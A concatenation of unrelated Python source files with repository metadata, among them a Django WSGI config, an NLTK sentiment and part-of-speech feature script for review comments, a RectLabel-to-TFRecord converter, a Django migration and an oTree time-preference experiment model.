UTF-8
|
Python
| false
| false
| 406
|
py
|
"""
WSGI config for bikeax project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bikeax.settings")
application = get_wsgi_application()
|
[
"ccsreenidhin@gmail.com"
] |
ccsreenidhin@gmail.com
|
f013cb70fc081f157e67c61bab659847bfe58297
|
8160376d2aba1e70d81d7b1465e1aaabe6ee304b
|
/code/test_features.py
|
eb70c5bbf5cdc336749c472ed988c6e88ad0fda4
|
[] |
no_license
|
UtkarshVIT/independentstudy
|
a6c2ae417fd0bf7b7f86d60a0338627b79b15b95
|
ace3329f2f8f7a75b4e40ee053b6ec234f695b44
|
refs/heads/master
| 2020-05-02T08:47:42.044123
| 2019-04-25T21:00:43
| 2019-04-25T21:00:43
| 177,851,875
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,234
|
py
|
import nltk
import csv
import io
from string import digits
from nltk.sentiment.vader import SentimentIntensityAnalyzer
import matplotlib
import matplotlib.pyplot as plt
from sklearn.feature_extraction.text import TfidfVectorizer
import sys
from collections import Counter
from decimal import *
import pandas as pd
import numpy
getcontext().prec = 3
reload(sys)
sys.setdefaultencoding('utf8')
sid = SentimentIntensityAnalyzer()
sen_list_with_problem = list()
sen_list_without_problem = list()
'''
with io.open('train_set.csv', encoding='utf8', errors='ignore') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
if row[2] == '1':
sen_list_with_problem.append(''.join(x for x in row[0] if x.isalpha() or x ==' '))
elif row[2] == '-1':
sen_list_without_problem.append(''.join(x for x in row[0] if x.isalpha() or x ==' '))
'''
def getSentimentScore(sentence, senti):
temp = sentence.split('.')
count_temp = 0.0
for sen in temp:
count_temp += sid.polarity_scores(sen)[senti]
print count_temp/len(temp)
return count_temp/len(temp)
list1 = list()
list2 = list()
vectorizer = 2
X = 2
def createTfIDFFeature(list1, list2):
global vectorizer
global X
doc1 = ' '.join(list1)
doc2 = ' '.join(list2)
vectorizer = TfidfVectorizer()
X = vectorizer.fit_transform([doc1, doc2])
def getIndex(word_test):
global vectorizer
global X
index = 0
for word in vectorizer.get_feature_names():
if word == word_test:
return index
index += 1
return -1
def getSenScore(sen):
global vectorizer
global X
score_class1 = 0
score_class2 = 0
for word in sen.split(' '):
index = getIndex(word)
if index != -1:
score_class1 += X[0, index]
score_class2 += X[1, index]
return [score_class1, score_class2]
#createTfIDFFeature(sen_list_with_problem, sen_list_without_problem)
#df = pd.read_csv("train_set2.csv")
def createScores():
df = pd.read_csv("train_set3.csv")
for i in range(0, df.shape[0]):
print 'done' + str(i) + "/" + str(df.shape[0])
sen = ''.join(x for x in df.comments[i] if x.isalpha() or x ==' ')
tokens = nltk.word_tokenize(sen.lower())
text = nltk.Text(tokens)
tags = nltk.pos_tag(text)
NN_count = 0.0
VB_count = 0.0
AD_count= 0.0
ADV_count = 0.0
counts = Counter(tag for word,tag in tags)
tot = sum(counts.values())
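        # tally nouns, adverbs, verbs and adjectives as fractions of all POS tags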
for ele in counts:
if ele == 'NN' or ele == 'NNP' or ele == 'NNS':
NN_count += counts[ele]
if ele == 'RB' or ele == 'RBR' or ele == 'RBS':
ADV_count += counts[ele]
if ele == 'VB' or ele == 'VBD' or ele == 'VBG' or ele == 'VBN' or ele == 'VBP' or ele == 'VBZ':
VB_count += counts[ele]
if ele == 'JJ' or ele == 'JJR' or ele == 'JJS':
AD_count += counts[ele]
if tot != 0:
df.NN[i] = round(NN_count/tot, 2)
df.RB[i] = round(VB_count/tot, 2)
df.VB[i] = round(AD_count/tot, 2)
df.JJ[i] = round(ADV_count/tot, 2)
df.to_csv('train_set4.csv', index=False)
createScores()
def cor_test():
for i in range(0, df.shape[0]):
#for i in range(0, 5):
print 'done: ' + str(i) + '/' + str(df.shape[0])
df.neg_senti[i] = getSentimentScore(df.comments[i], 'neg')
df.pos_senti[i] = getSentimentScore(df.comments[i], 'pos')
res = getSenScore(df.comments[i])
df.tf_score[i] = -1 if res[0]< res[1] else 1
df.to_csv('train_set2.csv', index=False)
res = 0.0
cor_res = 0.0
for i in range(0, df.shape[0]):
if df.tf_score[i].astype(numpy.int64) == df.value[i]:
cor_res += 1.0
res += 1.0
print cor_res/res, res, cor_res
'''
check = 0
ls = []
for i in range(0, df.shape[0]):
if df.value[i] == numpy.int64(check):
ls.append(i)
print ls
df = df.drop(df.index[ls])
df.to_csv('train_set3.csv', index=False)
df = pd.read_csv("train_set3.csv")
ls = []
for i in range(0, df.shape[0]):
if df.value[i] == numpy.int64(check):
ls.append(i)
print ls
'''
'''
check = 0
print type(check), type(numpy.int64(check)), type(df.value[0]), numpy.int64(check), df.value[0]
df[df.value != numpy.int64(check)]
df.to_csv('train_set3.csv', index=False)
'''
'''
def test_classifier():
global vectorizer
global X
tot_count = 0.0
corr_count = 0.0
with io.open('expertiza_new_clean_data_test_set.csv', encoding='utf8', errors='ignore') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
if row[2] != 0:
sen = ''.join(x for x in row[0] if x.isalpha() or x ==' ')
tot_count += 1.0
res = getSenScore(sen)
final_res = -1 if res[0]< res[1] else 1
print final_res, row[2]
if str(final_res) == row[2]:
corr_count += 1.0
print 'Final Result: ', corr_count/tot_count
'''
def sentimentScoreAttributeAnalysis():
ans1 = 0
ans2 = 0
for i in range(0, len(sen_list_with_problem)):
temp = sen_list_with_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['neg']
ans1 += count_temp/len(temp)
list1.append(count_temp)
plt.scatter([0 for i in range(0, len(list1))], list1, color = "blue", label='with problems')
for i in range(0, len(sen_list_without_problem)):
temp = sen_list_without_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['neg']
ans2 += count_temp/len(temp)
list2.append(count_temp)
plt.scatter([0.2 for i in range(0, len(list2))], list2, color = "red", label='without problems')
print "Mean NEG value for Sen with problems: ", ans1/len(sen_list_with_problem)
print "Mean NEG value for Sen without problems: ", ans2/len(sen_list_without_problem)
ans1 = 0
ans2 = 0
for i in range(0, len(sen_list_with_problem)):
temp = sen_list_with_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['pos']
ans1 += count_temp/len(temp)
list1.append(count_temp)
plt.scatter([2 for i in range(0, len(list1))], list1, color = "blue")
for i in range(0, len(sen_list_without_problem)):
temp = sen_list_without_problem[i].split('.')
count_temp = 0
for sen in temp:
count_temp += sid.polarity_scores(sen)['pos']
ans2 += count_temp/len(temp)
list2.append(count_temp)
plt.scatter([2.2 for i in range(0, len(list2))], list2, color = "red")
plt.legend(loc='upper right')
plt.show()
print "Mean POS value for Sen with problems: ", ans1/len(sen_list_with_problem)
print "Mean POS value for Sen without problems: ", ans2/len(sen_list_without_problem)
#sentimentScoreAttributeAnalysis()
'''
def getWordTypeCount():
NN = []
VB = []
AD = []
ADV = []
for i in range(0, len(sen_list_with_problem)):
sen_comment = ''.join(x for x in sen_list_with_problem[i] if x.isalpha() or x ==' ')
tokens = nltk.word_tokenize(sen_comment.lower())
text = nltk.Text(tokens)
tags = nltk.pos_tag(text)
NN_count = 0.0
VB_count = 0.0
AD_count= 0.0
ADV_count = 0.0
counts = Counter(tag for word,tag in tags)
tot = sum(counts.values())
for ele in counts:
if ele == 'NN' or ele == 'NNP' or ele == 'NNS':
NN_count += counts[ele]
if ele == 'RB' or ele == 'RBR' or ele == 'RBS':
ADV_count += counts[ele]
if ele == 'VB' or ele == 'VBD' or ele == 'VBG' or ele == 'VBN' or ele == 'VBP' or ele == 'VBZ':
VB_count += counts[ele]
if ele == 'JJ' or ele == 'JJR' or ele == 'JJS':
AD_count += counts[ele]
if tot != 0:
NN.append(NN_count/tot);VB.append(VB_count/tot);AD.append(AD_count/tot);ADV.append(ADV_count/tot)
ls1 = [round(x, 2) for x in NN]
ls2= [round(x, 2) for x in VB]
ls3= [round(x, 2) for x in AD]
ls4= [round(x, 2) for x in ADV]
plt.scatter([0 for i in range(0, len(ls1))], ls1, color = "blue", label='with problems')
plt.scatter([1 for i in range(0, len(ls2))], ls2, color = "blue")
plt.scatter([2 for i in range(0, len(ls3))], ls3, color = "blue")
plt.scatter([3 for i in range(0, len(ls4))], ls4, color = "blue")
NN = []
VB = []
AD = []
ADV = []
for i in range(0, len(sen_list_without_problem)):
sen_comment = ''.join(x for x in sen_list_without_problem[i] if x.isalpha() or x ==' ')
tokens = nltk.word_tokenize(sen_comment.lower())
text = nltk.Text(tokens)
tags = nltk.pos_tag(text)
NN_count = 0.0
VB_count = 0.0
AD_count= 0.0
ADV_count = 0.0
counts = Counter(tag for word,tag in tags)
tot = sum(counts.values())
for ele in counts:
if ele == 'NN' or ele == 'NNP' or ele == 'NNS':
NN_count += counts[ele]
if ele == 'RB' or ele == 'RBR' or ele == 'RBS':
ADV_count += counts[ele]
if ele == 'VB' or ele == 'VBD' or ele == 'VBG' or ele == 'VBN' or ele == 'VBP' or ele == 'VBZ':
VB_count += counts[ele]
if ele == 'JJ' or ele == 'JJR' or ele == 'JJS':
AD_count += counts[ele]
if tot != 0:
NN.append(NN_count/tot);VB.append(VB_count/tot);AD.append(AD_count/tot);ADV.append(ADV_count/tot)
ls1 = [round(x, 2) for x in NN]
ls2 = [round(x, 2) for x in VB]
ls3 = [round(x, 2) for x in AD]
ls4 = [round(x, 2) for x in ADV]
plt.scatter([0.1 for i in range(0, len(ls1))], ls1, color = "red", label='without problems')
plt.scatter([1.1 for i in range(0, len(ls2))], ls2, color = "red")
plt.scatter([2.1 for i in range(0, len(ls3))], ls3, color = "red")
plt.scatter([3.1 for i in range(0, len(ls4))], ls4, color = "red")
plt.legend(loc='upper right')
plt.show()
getWordTypeCount()
'''
|
[
"utkarshsharma351@gmail.com"
] |
utkarshsharma351@gmail.com
|
b242e795afaf110f82c6adb7c06931cff33ad7e3
|
a7acc0c80a2588c41646a40c1238d1622013cafd
|
/rectlabel_create_pascal_tf_record.py
|
eb4c1d2f38a63826f5d494c8bb250662e4236e09
|
[] |
no_license
|
3rdTools/Rectlabel-support
|
10ebea95211a8b561df16db2e4a55bc4ff3a9cb2
|
d07129be5eb8f713a457927264440c4082284de7
|
refs/heads/master
| 2020-04-22T15:07:53.743288
| 2019-02-12T13:25:18
| 2019-02-12T13:25:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,365
|
py
|
r"""
python object_detection/dataset_tools/rectlabel_create_pascal_tf_record.py \
--images_dir="${IMAGES_DIR}" \
--image_list_path="${IMAGE_LIST_PATH}" \
--label_map_path="${LABEL_MAP_PATH}" \
--output_path="${OUTPUT_PATH}" \
--include_masks
"""
import hashlib
import io
import os
import glob
import random
from pprint import pprint
from lxml import etree
import numpy as np
np.set_printoptions(threshold=np.nan)
import PIL.Image
import tensorflow as tf
from object_detection.utils import dataset_util
from object_detection.utils import label_map_util
flags = tf.app.flags
flags.DEFINE_string('images_dir', '', 'Full path to the images directory.')
flags.DEFINE_string('image_list_path', 'train.txt', 'Path to image list text file.')
flags.DEFINE_string('annotations_dir', 'annotations', 'Relative path to annotations directory.')
flags.DEFINE_string('label_map_path', 'data/pascal_label_map.pbtxt', 'Path to label map proto.')
flags.DEFINE_string('output_path', '', 'Path to output TFRecord.')
flags.DEFINE_boolean('include_masks', False, 'Add image/object/mask to TFRecord using png images in annotations folder.')
flags.DEFINE_boolean('ignore_difficult_instances', False, 'Whether to ignore difficult instances.')
FLAGS = flags.FLAGS
def getClassId(name, label_map_dict):
class_id = -1
for item_name, item_id in label_map_dict.items():
if name in item_name:
class_id = item_id
break
return class_id
def dict_to_tf_example(data, image_file, annotations_dir, label_map_dict, include_masks, ignore_difficult_instances):
with tf.gfile.GFile(image_file, 'rb') as fid:
encoded_jpg = fid.read()
encoded_jpg_io = io.BytesIO(encoded_jpg)
image = PIL.Image.open(encoded_jpg_io)
if image.format != 'JPEG':
raise ValueError('Image format not JPEG')
key = hashlib.sha256(encoded_jpg).hexdigest()
width = int(data['size']['width'])
height = int(data['size']['height'])
xmin = []
ymin = []
xmax = []
ymax = []
classes = []
classes_text = []
truncated = []
poses = []
difficult_obj = []
masks = []
if 'object' in data:
for idx, obj in enumerate(data['object']):
difficult = bool(int(obj['difficult']))
if ignore_difficult_instances and difficult:
continue
class_id = getClassId(obj['name'], label_map_dict)
if class_id < 0:
continue
difficult_obj.append(int(difficult))
xmin.append(float(obj['bndbox']['xmin']) / width)
ymin.append(float(obj['bndbox']['ymin']) / height)
xmax.append(float(obj['bndbox']['xmax']) / width)
ymax.append(float(obj['bndbox']['ymax']) / height)
classes_text.append(obj['name'].encode('utf8'))
classes.append(class_id)
truncated.append(int(obj['truncated']))
poses.append(obj['pose'].encode('utf8'))
if include_masks:
mask_path = os.path.join(annotations_dir, os.path.splitext(data['filename'])[0] + '_object' + str(idx) + '.png')
with tf.gfile.GFile(mask_path, 'rb') as fid:
encoded_mask_png = fid.read()
encoded_png_io = io.BytesIO(encoded_mask_png)
mask = PIL.Image.open(encoded_png_io)
if mask.format != 'PNG':
raise ValueError('Mask format not PNG')
mask_np = np.asarray(mask)
mask_remapped = (mask_np == 255).astype(np.uint8)
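                # RectLabel writes one PNG per object with 255 marking object
                # pixels; remap to the 0/1 uint8 masks the TF Object Detection
                # API expects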
masks.append(mask_remapped)
feature_dict = {
'image/height': dataset_util.int64_feature(height),
'image/width': dataset_util.int64_feature(width),
'image/filename': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/source_id': dataset_util.bytes_feature(
data['filename'].encode('utf8')),
'image/key/sha256': dataset_util.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_util.bytes_feature(encoded_jpg),
'image/format': dataset_util.bytes_feature('jpeg'.encode('utf8')),
'image/object/bbox/xmin': dataset_util.float_list_feature(xmin),
'image/object/bbox/xmax': dataset_util.float_list_feature(xmax),
'image/object/bbox/ymin': dataset_util.float_list_feature(ymin),
'image/object/bbox/ymax': dataset_util.float_list_feature(ymax),
'image/object/class/text': dataset_util.bytes_list_feature(classes_text),
'image/object/class/label': dataset_util.int64_list_feature(classes),
'image/object/difficult': dataset_util.int64_list_feature(difficult_obj),
'image/object/truncated': dataset_util.int64_list_feature(truncated),
'image/object/view': dataset_util.bytes_list_feature(poses),
}
if include_masks:
encoded_mask_png_list = []
for mask in masks:
img = PIL.Image.fromarray(mask)
output = io.BytesIO()
img.save(output, format='PNG')
encoded_mask_png_list.append(output.getvalue())
feature_dict['image/object/mask'] = (dataset_util.bytes_list_feature(encoded_mask_png_list))
example = tf.train.Example(features=tf.train.Features(feature=feature_dict))
return example
def main(_):
images_dir = FLAGS.images_dir
image_files = dataset_util.read_examples_list(FLAGS.image_list_path)
annotations_dir = os.path.join(images_dir, FLAGS.annotations_dir)
label_map_dict = label_map_util.get_label_map_dict(FLAGS.label_map_path)
writer = tf.python_io.TFRecordWriter(FLAGS.output_path)
for idx, image_file in enumerate(image_files):
print(idx, image_file)
image_file_split = image_file.split('/')
annotation_path = os.path.join(annotations_dir, os.path.splitext(image_file_split[-1])[0] + '.xml')
with tf.gfile.GFile(annotation_path, 'r') as fid:
xml_str = fid.read()
xml = etree.fromstring(xml_str)
data = dataset_util.recursive_parse_xml_to_dict(xml)['annotation']
tf_example = dict_to_tf_example(data, image_file, annotations_dir, label_map_dict, FLAGS.include_masks, FLAGS.ignore_difficult_instances)
writer.write(tf_example.SerializeToString())
writer.close()
if __name__ == '__main__':
tf.app.run()
|
[
"ryo@rectlabel.com"
] |
ryo@rectlabel.com
|
7c1d1a42ac22cdb4b343f2c5ebc05430930bacd4
|
325ff618114dd4af041f63049460b40cf6ce7c9d
|
/product/migrations/0009_product_left_time.py
|
d33402ba4b72c627806f4e366bdb57e3e0c1bf5c
|
[] |
no_license
|
dedysutanto/hkTimer-server
|
59f57fab3c9ca3ecf399f7d95ce6ec07e2487478
|
9c8e878ed79e99b7669cd1f7bc617835081ef3e9
|
refs/heads/master
| 2020-03-08T20:18:41.520894
| 2018-05-02T06:48:04
| 2018-05-02T06:48:04
| 128,378,784
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
# Generated by Django 2.0.4 on 2018-04-09 05:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0008_auto_20180409_1034'),
]
operations = [
migrations.AddField(
model_name='product',
name='left_time',
field=models.PositiveIntegerField(default=0),
),
]
|
[
"dedy.sutanto@proit.co.id"
] |
dedy.sutanto@proit.co.id
|
3b28f32042b7f9b9d50bcb9d65cd9eb7dd7bde8b
|
3f3eb47cdd679dcacaf78f3542efd7af058c7ae1
|
/EconExp1_TimePrefPronoun1_intro/models.py
|
fa15c3e925470c83d800577c451ec927d0470a7d
|
[] |
no_license
|
cczallen/josieslab-oTree
|
92d2193a07198960521a4e3026b805ebbec4336e
|
71aa0ec0420357208f18a18925b04dc5e32c5013
|
refs/heads/master
| 2021-04-04T17:49:49.346385
| 2020-04-11T13:02:28
| 2020-04-11T13:02:28
| 248,476,238
| 0
| 0
| null | 2020-04-11T13:02:29
| 2020-03-19T10:40:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,920
|
py
|
from otree.api import (
models,
widgets,
BaseConstants,
BaseSubsession,
BaseGroup,
BasePlayer,
Currency as c,
currency_range,
)
from EconExp1_TimePrefPronoun1_questionaire.models import (
OptionOfGetMoney,
WaitingPeriod,
GainedAmount,
Treatment,
)
author = 'Josie_NTULAB'
doc = """
Decision experiment - instructions section
"""
class Constants(BaseConstants):
name_in_url = 'EconExp1_TimePrefPronoun1_intro'
players_per_group = None
num_rounds = 1
num_questions = len(WaitingPeriod) * len(GainedAmount)
pronoun = Treatment.pronoun
gained_amount_today = GainedAmount.get_TWD_today()
class Subsession(BaseSubsession):
def creating_session(self):
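        # assign each player's pronoun treatment once, when the session is created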
for p in self.get_players():
p.treatment_pronoun_included = Treatment.get_pronoun_included(p)
class Group(BaseGroup):
pass
class Player(BasePlayer):  # TODO: find a way to directly inherit (reuse) the Player methods from EconExp1_TimePrefPronoun1_questionaire.models when time permits
# number of weeks to wait (hidden)
waiting_period = models.IntegerField()
# payoff gained (hidden)
gained_amount = models.IntegerField()
treatment_pronoun_included = models.BooleanField(initial = False)
get_money_now_or_future = models.StringField(
label = '請選擇您要今天或未來的報酬',
widget = widgets.RadioSelect,
)
def get_money_now_or_future_choices(self):
return [
['now', OptionOfGetMoney.formatted_option(self, OptionOfGetMoney.OPTION_NOW)],
['future', OptionOfGetMoney.formatted_option(self, OptionOfGetMoney.OPTION_FUTURE)],
]
# number of times listened, as a count (hidden, logged from user behavior)
num_listen_times = models.IntegerField(initial = 0)
# decision duration, in seconds (hidden, logged from user behavior)
decision_duration = models.FloatField(initial = 0)
|
[
"cczallen@gmail.com"
] |
cczallen@gmail.com
|